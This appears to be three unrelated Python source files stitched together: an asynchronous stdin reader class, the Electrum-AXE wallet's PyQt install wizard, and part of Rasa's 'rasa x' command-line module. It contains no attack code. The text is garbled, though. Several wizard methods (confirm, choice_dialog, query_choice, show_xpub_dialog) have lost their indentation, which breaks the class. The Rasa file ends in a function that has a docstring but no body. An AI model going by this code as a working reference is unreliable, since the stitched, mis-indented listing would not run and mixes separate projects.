# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from threading import Thread
from io import StringIO
from queue import Queue, Empty
class WinPty(object):
    """Asynchronous reader around a stdin-like stream.

    A daemon thread pumps single characters from the stream into a queue;
    read() then drains the queue with an optional per-character timeout,
    so callers are never blocked indefinitely on the underlying stream.
    """
    def __init__(self, stdin):
        self._s = stdin
        self._q = Queue()

        def _read_next_char(stdin, queue):
            # Background thread body: blockingly read one character at a
            # time and enqueue it, stopping at EOF (empty read).
            while True:
                char = stdin.read(1)  # potentially blocking read
                if char:
                    queue.put(char)
                else:
                    break

        self._t = Thread(target=_read_next_char, args=(self._s, self._q))
        self._t.daemon = True
        self._t.start()  # read characters asynchronously from stdin

    def read(self, blksize=-1, timeout=1):
        """Return up to blksize buffered characters (unbounded when -1),
        waiting up to `timeout` seconds for each; a timeout of None makes
        the queue reads non-blocking."""
        buf = StringIO()
        count = 0
        try:
            while count < blksize or blksize == -1:
                # BUG FIX (idiom): local was named `next`, shadowing the builtin
                ch = self._q.get(block=timeout is not None, timeout=timeout)
                buf.write(ch)
                count = count + 1
        except Empty:
            # Queue drained (or per-char timeout hit): return what we have.
            pass
        return buf.getvalue()
|
installwizard.py |
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum_axe.wallet import Wallet
from electrum_axe.storage import WalletStorage
from electrum_axe.util import UserCancelled, InvalidPassword
from electrum_axe.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum_axe.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
# Prompt shown when choosing a new wallet password.
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
                     + _("Leave this field empty if you want to disable encryption.")
# Explanation shown when configuring file encryption for hardware wallets.
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
                            + _("Your wallet file does not contain secrets, mostly just metadata. ") \
                            + _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
                            + _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
# Help text for the WIF private key entry dialog.
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
                 _('A few examples') + ':\n' +
                 'p2pkh:XERBBcaPf5D5... \t-> XhGqfhnL...\n')
# note: full key is XERBBcaPf5D5oFXTEP7TdPWLem5ktc2Zr3AhhQhHVQaF49fDP6tN
# Warning shown for passphrases with irregular whitespace (Electrum issue #4566).
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
                                + _("You have multiple consecutive whitespaces or leading/trailing "
                                    "whitespaces in your passphrase.") + " " \
                                + _("This is discouraged.") + " " \
                                + _("Due to a bug, old versions of Electrum will NOT be creating the "
                                    "same wallet as newer versions or other software.")
class CosignWidget(QWidget):
    # Pie-chart widget visualising an m-of-n multisig setup:
    # n slices in total, the first m drawn green (required signatures).
    size = 120  # fixed widget height in pixels

    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(4, 4, self.size-8, self.size-8)  # drawing rect, 4px margin
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m  # required signatures
        self.n = n  # total cosigners

    def set_n(self, n):
        # Update the cosigner count and schedule a repaint.
        self.n = n
        self.update()

    def set_m(self, m):
        # Update the required-signatures count and schedule a repaint.
        self.m = m
        self.update()

    def paintEvent(self, event):
        # Slice borders use the background colour so slices appear separated.
        bgcolor = self.palette().color(QPalette.Background)
        pen = QPen(bgcolor, 8, Qt.SolidLine)
        qp = QPainter()
        qp.begin(self)
        qp.setPen(pen)
        qp.setRenderHint(QPainter.Antialiasing)
        qp.setBrush(Qt.gray)
        for i in range(self.n):
            # Qt pie angles are expressed in 1/16ths of a degree.
            alpha = int(16* 360 * i/self.n)
            alpha2 = int(16* 360 * 1/self.n)
            qp.setBrush(Qt.green if i<self.m else Qt.gray)
            qp.drawPie(self.R, alpha, alpha2)
        qp.end()
def wizard_dialog(func):
    """Decorator for InstallWizard dialog methods.

    Updates the Back/Cancel button label, converts GoBack/UserCancelled
    exceptions into wizard navigation, and feeds the dialog's return value
    into the `run_next` callback supplied (as a keyword) by BaseWizard.
    """
    from functools import wraps

    @wraps(func)  # BUG FIX: preserve the wrapped dialog's name/docstring
    def func_wrapper(*args, **kwargs):
        run_next = kwargs['run_next']
        wizard = args[0]
        wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
        try:
            out = func(*args, **kwargs)
        except GoBack:
            # Step back one page if possible, otherwise close the wizard.
            # (Was a conditional *expression* used purely for side effects.)
            if wizard.can_go_back():
                wizard.go_back()
            else:
                wizard.close()
            return
        except UserCancelled:
            return
        #if out is None:
        #    out = ()
        if type(out) is not tuple:
            out = (out,)
        run_next(*out)
    return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
    # Emitted to accept/close the dialog from the GUI thread (see terminate()).
    accept_signal = pyqtSignal()

    def __init__(self, config, app, plugins, storage):
        BaseWizard.__init__(self, config, plugins, storage)
        QDialog.__init__(self, None)
        self.setWindowTitle('Electrum-AXE - ' + _('Install Wizard'))
        self.app = app
        self.config = config
        # Set for base base class
        self.language_for_seed = config.get('language')
        self.setMinimumSize(600, 400)
        self.accept_signal.connect(self.accept)
        self.title = QLabel()
        self.main_widget = QWidget()
        self.back_button = QPushButton(_("Back"), self)
        self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
        self.next_button = QPushButton(_("Next"), self)
        self.next_button.setDefault(True)
        self.logo = QLabel()
        self.please_wait = QLabel(_("Please wait..."))
        self.please_wait.setAlignment(Qt.AlignCenter)
        self.icon_filename = None
        # Nested event loop driven by the buttons; exit codes:
        # 0 = dialog rejected/cancelled, 1 = back, 2 = next.
        self.loop = QEventLoop()
        self.rejected.connect(lambda: self.loop.exit(0))
        self.back_button.clicked.connect(lambda: self.loop.exit(1))
        self.next_button.clicked.connect(lambda: self.loop.exit(2))
        outer_vbox = QVBoxLayout(self)
        inner_vbox = QVBoxLayout()
        inner_vbox.addWidget(self.title)
        inner_vbox.addWidget(self.main_widget)
        inner_vbox.addStretch(1)
        inner_vbox.addWidget(self.please_wait)
        inner_vbox.addStretch(1)
        # The page content scrolls; the logo column on the left stays fixed.
        scroll_widget = QWidget()
        scroll_widget.setLayout(inner_vbox)
        scroll = QScrollArea()
        scroll.setWidget(scroll_widget)
        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scroll.setWidgetResizable(True)
        icon_vbox = QVBoxLayout()
        icon_vbox.addWidget(self.logo)
        icon_vbox.addStretch(1)
        hbox = QHBoxLayout()
        hbox.addLayout(icon_vbox)
        hbox.addSpacing(5)
        hbox.addWidget(scroll)
        hbox.setStretchFactor(scroll, 1)
        outer_vbox.addLayout(hbox)
        outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
        self.set_icon(':icons/electrum-axe.png')
        self.show()
        self.raise_()
        self.refresh_gui()  # Need for QT on MacOSX.  Lame.
    def run_and_get_wallet(self, get_wallet_from_daemon):
        """Show the wallet file selection page, handle decryption / split /
        pending-action cases, and return an open Wallet (or None on cancel).

        `get_wallet_from_daemon(path)` returns an already-open wallet, if any.
        """
        # --- build the file chooser page -------------------------------------
        vbox = QVBoxLayout()
        hbox = QHBoxLayout()
        hbox.addWidget(QLabel(_('Wallet') + ':'))
        self.name_e = QLineEdit()
        hbox.addWidget(self.name_e)
        button = QPushButton(_('Choose...'))
        hbox.addWidget(button)
        vbox.addLayout(hbox)
        self.msg_label = QLabel('')
        vbox.addWidget(self.msg_label)
        hbox2 = QHBoxLayout()
        self.pw_e = QLineEdit('', self)
        self.pw_e.setFixedWidth(150)
        self.pw_e.setEchoMode(2)  # QLineEdit.Password
        self.pw_label = QLabel(_('Password') + ':')
        hbox2.addWidget(self.pw_label)
        hbox2.addWidget(self.pw_e)
        hbox2.addStretch()
        vbox.addLayout(hbox2)
        self.set_layout(vbox, title=_('Electrum-AXE wallet'))
        wallet_folder = os.path.dirname(self.storage.path)

        def on_choose():
            # "Choose..." button: pick a wallet file via the native dialog.
            path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
            if path:
                self.name_e.setText(path)

        def on_filename(filename):
            # Re-validate the selected file on every keystroke and update the
            # status message / password field visibility accordingly.
            path = os.path.join(wallet_folder, filename)
            wallet_from_memory = get_wallet_from_daemon(path)
            try:
                if wallet_from_memory:
                    self.storage = wallet_from_memory.storage
                else:
                    self.storage = WalletStorage(path, manual_upgrades=True)
                self.next_button.setEnabled(True)
            except BaseException:
                traceback.print_exc(file=sys.stderr)
                self.storage = None
                self.next_button.setEnabled(False)
            if self.storage:
                if not self.storage.file_exists():
                    msg = _("This file does not exist.") + '\n' \
                          + _("Press 'Next' to create this wallet, or choose another file.")
                    pw = False
                elif not wallet_from_memory:
                    if self.storage.is_encrypted_with_user_pw():
                        msg = _("This file is encrypted with a password.") + '\n' \
                              + _('Enter your password or choose another file.')
                        pw = True
                    elif self.storage.is_encrypted_with_hw_device():
                        msg = _("This file is encrypted using a hardware device.") + '\n' \
                              + _("Press 'Next' to choose device to decrypt.")
                        pw = False
                    else:
                        msg = _("Press 'Next' to open this wallet.")
                        pw = False
                else:
                    msg = _("This file is already open in memory.") + "\n" \
                          + _("Press 'Next' to create/focus window.")
                    pw = False
            else:
                msg = _('Cannot read file')
                pw = False
            self.msg_label.setText(msg)
            # Only show the password field when a user password is required.
            if pw:
                self.pw_label.show()
                self.pw_e.show()
                self.pw_e.setFocus()
            else:
                self.pw_label.hide()
                self.pw_e.hide()

        button.clicked.connect(on_choose)
        self.name_e.textChanged.connect(on_filename)
        n = os.path.basename(self.storage.path)
        self.name_e.setText(n)

        # --- event loop: keep asking until a usable storage is selected ------
        while True:
            if self.loop.exec_() != 2:  # 2 = next
                return
            if self.storage.file_exists() and not self.storage.is_encrypted():
                break
            if not self.storage.file_exists():
                break
            wallet_from_memory = get_wallet_from_daemon(self.storage.path)
            if wallet_from_memory:
                return wallet_from_memory
            if self.storage.file_exists() and self.storage.is_encrypted():
                if self.storage.is_encrypted_with_user_pw():
                    password = self.pw_e.text()
                    try:
                        self.storage.decrypt(password)
                        break
                    except InvalidPassword as e:
                        # Wrong password: report and loop back to the page.
                        QMessageBox.information(None, _('Error'), str(e))
                        continue
                    except BaseException as e:
                        traceback.print_exc(file=sys.stdout)
                        QMessageBox.information(None, _('Error'), str(e))
                        return
                elif self.storage.is_encrypted_with_hw_device():
                    try:
                        self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
                    except InvalidPassword as e:
                        QMessageBox.information(
                            None, _('Error'),
                            _('Failed to decrypt using this hardware device.') + '\n' +
                            _('If you use a passphrase, make sure it is correct.'))
                        # Restart the whole selection flow from scratch.
                        self.stack = []
                        return self.run_and_get_wallet(get_wallet_from_daemon)
                    except BaseException as e:
                        traceback.print_exc(file=sys.stdout)
                        QMessageBox.information(None, _('Error'), str(e))
                        return
                    if self.storage.is_past_initial_decryption():
                        break
                    else:
                        return
                else:
                    raise Exception('Unexpected encryption version')

        # --- post-selection handling: split / pending action / open ----------
        path = self.storage.path
        if self.storage.requires_split():
            self.hide()
            msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum-AXE 2.7.\n\n"
                    "Do you want to split your wallet into multiple files?").format(path)
            if not self.question(msg):
                return
            file_list = '\n'.join(self.storage.split_accounts())
            msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
            if self.question(msg):
                os.remove(path)
                self.show_warning(_('The file was removed'))
            return

        action = self.storage.get_action()
        if action and action not in ('new', 'upgrade_storage'):
            # The file holds a wallet whose creation was interrupted.
            self.hide()
            msg = _("The file '{}' contains an incompletely created wallet.\n"
                    "Do you want to complete its creation now?").format(path)
            if not self.question(msg):
                if self.question(_("Do you want to delete '{}'?").format(path)):
                    os.remove(path)
                    self.show_warning(_('The file was removed'))
                return
            self.show()
        if action:
            # self.wallet is set in run
            self.run(action)
            return self.wallet

        self.wallet = Wallet(self.storage)
        return self.wallet
    def finished(self):
        """Called in hardware client wrapper, in order to close popups."""
        return

    def on_error(self, exc_info):
        # Report any exception from a wizard task to the user, except
        # deliberate cancellations.
        if not isinstance(exc_info[1], UserCancelled):
            traceback.print_exception(*exc_info)
            self.show_error(str(exc_info[1]))

    def set_icon(self, filename):
        # Swap the wizard's logo pixmap; returns the previous icon filename.
        prior_filename, self.icon_filename = self.icon_filename, filename
        self.logo.setPixmap(QPixmap(filename).scaledToWidth(60, mode=Qt.SmoothTransformation))
        return prior_filename
    def set_layout(self, layout, title=None, next_enabled=True):
        """Install `layout` as the currently shown wizard page."""
        self.title.setText("<b>%s</b>"%title if title else "")
        self.title.setVisible(bool(title))
        # Get rid of any prior layout by assigning it to a temporary widget
        prior_layout = self.main_widget.layout()
        if prior_layout:
            QWidget().setLayout(prior_layout)
        self.main_widget.setLayout(layout)
        self.back_button.setEnabled(True)
        self.next_button.setEnabled(next_enabled)
        if next_enabled:
            self.next_button.setFocus()
        self.main_widget.setVisible(True)
        self.please_wait.setVisible(False)

    def exec_layout(self, layout, title=None, raise_on_cancel=True,
                    next_enabled=True):
        """Show `layout` and block in the nested event loop until the user
        acts; raises UserCancelled (exit code 0) or GoBack (exit code 1),
        otherwise switches to the 'please wait' state and returns the code."""
        self.set_layout(layout, title, next_enabled)
        result = self.loop.exec_()
        if not result and raise_on_cancel:
            raise UserCancelled
        if result == 1:
            raise GoBack from None
        self.title.setVisible(False)
        self.back_button.setEnabled(False)
        self.next_button.setEnabled(False)
        self.main_widget.setVisible(False)
        self.please_wait.setVisible(True)
        self.refresh_gui()
        return result

    def refresh_gui(self):
        # For some reason, to refresh the GUI this needs to be called twice
        self.app.processEvents()
        self.app.processEvents()
    def remove_from_recently_open(self, filename):
        # Forward to the config's recently-opened-wallets bookkeeping.
        self.config.remove_from_recently_open(filename)

    def text_input(self, title, message, is_valid, allow_multi=False):
        """Show a validated free-text entry page; returns the entered text."""
        slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
                             allow_multi=allow_multi)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_text()

    def seed_input(self, title, message, is_seed, options):
        """Show a seed entry page; returns (seed, is_bip39, is_ext)."""
        slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
        self.exec_layout(slayout, title, next_enabled=False)
        return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
    @wizard_dialog
    def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
        # Master-public-key entry page, optionally with a WIF help button.
        header_layout = QHBoxLayout()
        label = WWLabel(message)
        label.setMinimumWidth(400)
        header_layout.addWidget(label)
        if show_wif_help:
            header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
        return self.text_input(title, header_layout, is_valid, allow_multi)

    @wizard_dialog
    def add_cosigner_dialog(self, run_next, index, is_valid):
        # Entry page for the index-th cosigner's xpub (or xprv).
        title = _("Add Cosigner") + " %d"%index
        message = ' '.join([
            _('Please enter the master public key (xpub) of your cosigner.'),
            _('Enter their master private key (xprv) if you want to be able to sign for them.')
        ])
        return self.text_input(title, message, is_valid)

    @wizard_dialog
    def restore_seed_dialog(self, run_next, test):
        # Seed restore page; extension/BIP39 options depend on wizard flags.
        options = []
        if self.opt_ext:
            options.append('ext')
        if self.opt_bip39:
            options.append('bip39')
        title = _('Enter Seed')
        message = _('Please enter your seed phrase in order to restore your wallet.')
        return self.seed_input(title, message, test, options)

    @wizard_dialog
    def confirm_seed_dialog(self, run_next, test):
        # Clear the clipboard first so the seed cannot simply be pasted back.
        self.app.clipboard().clear()
        title = _('Confirm Seed')
        message = ' '.join([
            _('Your seed is important!'),
            _('If you lose your seed, your money will be permanently lost.'),
            _('To make sure that you have properly saved your seed, please retype it here.')
        ])
        seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
        return seed

    @wizard_dialog
    def show_seed_dialog(self, run_next, seed_text):
        # Display a newly generated seed; returns whether 'ext' was chosen.
        title = _("Your wallet generation seed is:")
        slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
        self.exec_layout(slayout)
        return slayout.is_ext
    def pw_layout(self, msg, kind, force_disable_encrypt_cb):
        """Show a new-password page; returns (password, encrypt_wallet_flag)."""
        playout = PasswordLayout(None, msg, kind, self.next_button,
                                 force_disable_encrypt_cb=force_disable_encrypt_cb)
        playout.encrypt_cb.setChecked(True)  # encryption opt-out, not opt-in
        self.exec_layout(playout.layout())
        return playout.new_password(), playout.encrypt_cb.isChecked()

    @wizard_dialog
    def request_password(self, run_next, force_disable_encrypt_cb=False):
        """Request the user enter a new password and confirm it.  Return
        the password or None for no password."""
        return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)

    @wizard_dialog
    def request_storage_encryption(self, run_next):
        # Hardware-wallet variant: only asks whether to encrypt the file.
        playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
        playout.encrypt_cb.setChecked(True)
        self.exec_layout(playout.layout())
        return playout.encrypt_cb.isChecked()

    @wizard_dialog
    def confirm_dialog(self, title, message, run_next):
        # Simple OK/confirm step within the wizard flow.
        self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
    @wizard_dialog
    def action_dialog(self, action, run_next):
        # Execute a named BaseWizard action as a wizard step.
        self.run(action)

    def terminate(self):
        # Thread-safe close: emits the signal connected to QDialog.accept().
        self.accept_signal.emit()
    def waiting_dialog(self, task, msg, on_finished=None):
        """Run `task` on a background thread while showing `msg`, keeping the
        GUI responsive; call `on_finished` once the task completes."""
        label = WWLabel(msg)
        vbox = QVBoxLayout()
        vbox.addSpacing(100)
        label.setMinimumWidth(300)
        label.setAlignment(Qt.AlignCenter)
        vbox.addWidget(label)
        self.set_layout(vbox, next_enabled=False)
        self.back_button.setEnabled(False)
        t = threading.Thread(target=task)
        t.start()
        while True:
            t.join(1.0/60)  # poll at roughly 60 Hz
            if t.is_alive():
                self.refresh_gui()  # keep Qt events flowing while we wait
            else:
                break
        if on_finished:
            on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
    @wizard_dialog
    def choice_and_line_dialog(self, title, message1, choices, message2,
                               test_text, run_next) -> (str, str):
        """Combined page: a choice list plus a validated line edit whose
        default text tracks the selected choice.  Returns (text, choice)."""
        vbox = QVBoxLayout()
        c_values = [x[0] for x in choices]
        c_titles = [x[1] for x in choices]
        c_default_text = [x[2] for x in choices]

        def on_choice_click(clayout):
            # Selecting a choice replaces the line edit's default text.
            idx = clayout.selected_index()
            line.setText(c_default_text[idx])

        clayout = ChoicesLayout(message1, c_titles, on_choice_click)
        vbox.addLayout(clayout.layout())
        vbox.addSpacing(50)
        vbox.addWidget(WWLabel(message2))
        line = QLineEdit()

        def on_text_change(text):
            # Next is only enabled while the entered text validates.
            self.next_button.setEnabled(test_text(text))

        line.textEdited.connect(on_text_change)
        on_choice_click(clayout)  # set default text for "line"
        vbox.addWidget(line)
        self.exec_layout(vbox, title)
        choice = c_values[clayout.selected_index()]
        return str(line.text()), choice
    @wizard_dialog
    def line_dialog(self, run_next, title, message, default, test, warning='',
                    presets=(), warn_issue4566=False):
        """Single validated line-edit page with optional preset buttons and
        the issue-#4566 whitespace warning.  Returns the entered text."""
        vbox = QVBoxLayout()
        vbox.addWidget(WWLabel(message))
        line = QLineEdit()
        line.setText(default)

        def f(text):
            self.next_button.setEnabled(test(text))
            if warn_issue4566:
                # Warn when the passphrase contains irregular whitespace.
                text_whitespace_normalised = ' '.join(text.split())
                warn_issue4566_label.setVisible(text != text_whitespace_normalised)

        line.textEdited.connect(f)
        vbox.addWidget(line)
        vbox.addWidget(WWLabel(warning))
        warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
        warn_issue4566_label.setVisible(False)
        vbox.addWidget(warn_issue4566_label)
        for preset in presets:
            # Each preset is a (button label, text to insert) pair.
            button = QPushButton(preset[0])
            button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
            button.setMinimumWidth(150)
            hbox = QHBoxLayout()
            hbox.addWidget(button, alignment=Qt.AlignCenter)
            vbox.addLayout(hbox)
        self.exec_layout(vbox, title, next_enabled=test(default))
        return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
    def init_network(self, network):
        """Ask the user how to connect to a server (auto vs. manual)."""
        message = _("Electrum-AXE communicates with remote servers to get "
                    "information about your transactions and addresses. The "
                    "servers all fulfill the same purpose only differing in "
                    "hardware. In most cases you simply want to let Electrum-AXE "
                    "pick one at random. However if you prefer feel free to "
                    "select a server manually.")
        choices = [_("Auto connect"), _("Select server manually")]
        title = _("How do you want to connect to a server? ")
        clayout = ChoicesLayout(message, choices)
        self.back_button.setText(_('Cancel'))
        self.exec_layout(clayout.layout(), title)
        r = clayout.selected_index()
        if r == 1:
            # Manual selection: show the full network configuration dialog.
            nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
            if self.exec_layout(nlayout.layout()):
                nlayout.accept()
        else:
            network.auto_connect = True
            self.config.set_key('auto_connect', True, True)
    @wizard_dialog
    def multisig_dialog(self, run_next):
        """Let the user pick m-of-n multisig parameters with two sliders;
        returns the (m, n) tuple."""
        cw = CosignWidget(2, 2)
        m_edit = QSlider(Qt.Horizontal, self)
        n_edit = QSlider(Qt.Horizontal, self)
        n_edit.setMinimum(2)
        n_edit.setMaximum(15)
        m_edit.setMinimum(1)
        m_edit.setMaximum(2)
        n_edit.setValue(2)
        m_edit.setValue(2)
        n_label = QLabel()
        m_label = QLabel()
        grid = QGridLayout()
        grid.addWidget(n_label, 0, 0)
        grid.addWidget(n_edit, 0, 1)
        grid.addWidget(m_label, 1, 0)
        grid.addWidget(m_edit, 1, 1)

        def on_m(m):
            m_label.setText(_('Require {0} signatures').format(m))
            cw.set_m(m)

        def on_n(n):
            n_label.setText(_('From {0} cosigners').format(n))
            cw.set_n(n)
            # m can never exceed the number of cosigners.
            m_edit.setMaximum(n)

        n_edit.valueChanged.connect(on_n)
        m_edit.valueChanged.connect(on_m)
        on_n(2)
        on_m(2)
        vbox = QVBoxLayout()
        vbox.addWidget(cw)
        vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
        vbox.addLayout(grid)
        self.exec_layout(vbox, _("Multi-Signature Wallet"))
        m = int(m_edit.value())
        n = int(n_edit.value())
        return (m, n)
|
x.py | import argparse
import asyncio
import importlib.util
import logging
from multiprocessing import get_context
import os
import signal
import sys
import traceback
from typing import Iterable, List, Optional, Text, Tuple
import aiohttp
import ruamel.yaml as yaml
from rasa import telemetry
from rasa.cli import SubParsersAction
from rasa.cli.arguments import x as arguments
import rasa.cli.utils
from rasa.constants import (
DEFAULT_LOG_LEVEL_RASA_X,
DEFAULT_RASA_PORT,
DEFAULT_RASA_X_PORT,
)
from rasa.shared.constants import (
DEFAULT_CONFIG_PATH,
DEFAULT_CREDENTIALS_PATH,
DEFAULT_DOMAIN_PATH,
DEFAULT_ENDPOINTS_PATH,
DOCS_BASE_URL_RASA_X,
)
from rasa.core.utils import AvailableEndpoints
from rasa.shared.exceptions import RasaXTermsError
import rasa.shared.utils.cli
import rasa.shared.utils.io
import rasa.utils.common
from rasa.utils.endpoints import EndpointConfig
import rasa.utils.io
logger = logging.getLogger(__name__)

# Filename of the local SQLite event broker database used by `rasa x`.
DEFAULT_EVENTS_DB = "events.db"
def add_subparser(
    subparsers: SubParsersAction, parents: List[argparse.ArgumentParser]
) -> None:
    """Add all rasa x parsers.

    Args:
        subparsers: subparser we are going to attach to
        parents: Parent parsers, needed to ensure tree structure in argparse
    """
    parser_kwargs = dict(
        parents=parents,
        conflict_handler="resolve",
        formatter_class=argparse.ArgumentDefaultsHelpFormatter,
    )
    if is_rasa_x_installed():
        # we'll only show the help msg for the command if Rasa X is actually installed
        parser_kwargs["help"] = "Starts the Rasa X interface."

    x_parser = subparsers.add_parser("x", **parser_kwargs)
    x_parser.set_defaults(func=rasa_x)
    arguments.set_x_arguments(x_parser)
def _rasa_service(
    args: argparse.Namespace,
    endpoints: AvailableEndpoints,
    rasa_x_url: Optional[Text] = None,
    credentials_path: Optional[Text] = None,
):
    """Starts the Rasa application."""
    from rasa.core.run import serve_application

    # needs separate logging configuration as it is started in its own process
    rasa.utils.common.set_log_level(args.loglevel)
    rasa.utils.io.configure_colored_logging(args.loglevel)

    if not credentials_path:
        # Build a temporary credentials file wiring the Rasa X channel.
        credentials_path = _prepare_credentials_for_rasa_x(
            args.credentials, rasa_x_url=rasa_x_url
        )

    serve_application(
        endpoints=endpoints,
        port=args.port,
        credentials=credentials_path,
        cors=args.cors,
        auth_token=args.auth_token,
        enable_api=True,
        jwt_secret=args.jwt_secret,
        jwt_method=args.jwt_method,
        ssl_certificate=args.ssl_certificate,
        ssl_keyfile=args.ssl_keyfile,
        ssl_ca_file=args.ssl_ca_file,
        ssl_password=args.ssl_password,
    )
def _prepare_credentials_for_rasa_x(
    credentials_path: Optional[Text], rasa_x_url: Optional[Text] = None
) -> Text:
    """Read (or default) the credentials config and return the path of a
    temporary YAML copy, with the Rasa X channel injected when a URL is given."""
    credentials_path = rasa.cli.utils.get_validated_path(
        credentials_path, "credentials", DEFAULT_CREDENTIALS_PATH, True
    )
    if credentials_path:
        credentials = rasa.shared.utils.io.read_config_file(credentials_path)
    else:
        credentials = {}

    # this makes sure the Rasa X is properly configured no matter what
    if rasa_x_url:
        credentials["rasa"] = {"url": rasa_x_url}
    dumped_credentials = yaml.dump(credentials, default_flow_style=False)
    tmp_credentials = rasa.utils.io.create_temporary_file(dumped_credentials, "yml")

    return tmp_credentials
def _overwrite_endpoints_for_local_x(
    endpoints: AvailableEndpoints, rasa_x_token: Text, rasa_x_url: Text
):
    # Point the model endpoint at local Rasa X and ensure a supported event
    # broker; both helpers warn or ask the user when overriding their config.
    endpoints.model = _get_model_endpoint(endpoints.model, rasa_x_token, rasa_x_url)
    endpoints.event_broker = _get_event_broker_endpoint(endpoints.event_broker)
def _get_model_endpoint(
    model_endpoint: Optional[EndpointConfig], rasa_x_token: Text, rasa_x_url: Text
) -> EndpointConfig:
    """Build the model-server endpoint used when running Rasa X locally."""
    # If you change that, please run a test with Rasa X and speak to the bot
    default_rasax_model_server_url = (
        f"{rasa_x_url}/projects/default/models/tags/production"
    )

    model_endpoint = model_endpoint or EndpointConfig()

    # Checking if endpoint.yml has existing url, if so give
    # warning we are overwriting the endpoint.yml file.
    custom_url = model_endpoint.url
    if custom_url and custom_url != default_rasax_model_server_url:
        logger.info(
            f"Ignoring url '{custom_url}' from 'endpoints.yml' and using "
            f"'{default_rasax_model_server_url}' instead."
        )

    # Preserve the user's pull interval if they configured one.
    custom_wait_time_pulls = model_endpoint.kwargs.get("wait_time_between_pulls")
    return EndpointConfig(
        default_rasax_model_server_url,
        token=rasa_x_token,
        wait_time_between_pulls=custom_wait_time_pulls or 2,
    )
def _get_event_broker_endpoint(
    event_broker_endpoint: Optional[EndpointConfig],
) -> EndpointConfig:
    """Return an event broker endpoint usable by local Rasa X, asking the
    user for permission before replacing an unsupported configuration."""
    import questionary

    default_event_broker_endpoint = EndpointConfig(
        type="sql", dialect="sqlite", db=DEFAULT_EVENTS_DB
    )

    if not event_broker_endpoint:
        return default_event_broker_endpoint
    if _is_correct_event_broker(event_broker_endpoint):
        return event_broker_endpoint

    # Unsupported broker configured: explain, then offer the default.
    rasa.shared.utils.cli.print_error(
        f"Rasa X currently only supports a SQLite event broker with path "
        f"'{DEFAULT_EVENTS_DB}' when running locally. You can deploy Rasa X "
        f"with Docker ({DOCS_BASE_URL_RASA_X}/installation-and-setup/"
        f"docker-compose-quick-install/) if you want to use other event broker "
        f"configurations."
    )
    continue_with_default_event_broker = questionary.confirm(
        "Do you want to continue with the default SQLite event broker?"
    ).ask()
    if not continue_with_default_event_broker:
        sys.exit(0)

    return default_event_broker_endpoint
def _is_correct_event_broker(event_broker: EndpointConfig) -> bool:
    """True iff `event_broker` is the local SQLite broker Rasa X supports."""
    if event_broker.type != "sql":
        return False
    if event_broker.kwargs.get("dialect", "").lower() != "sqlite":
        return False
    return event_broker.kwargs.get("db") == DEFAULT_EVENTS_DB
def start_rasa_for_local_rasa_x(args: argparse.Namespace, rasa_x_token: Text):
    """Starts the Rasa X API with Rasa as a background process.

    Returns the started `multiprocessing` process object so the caller can
    terminate it later.
    """
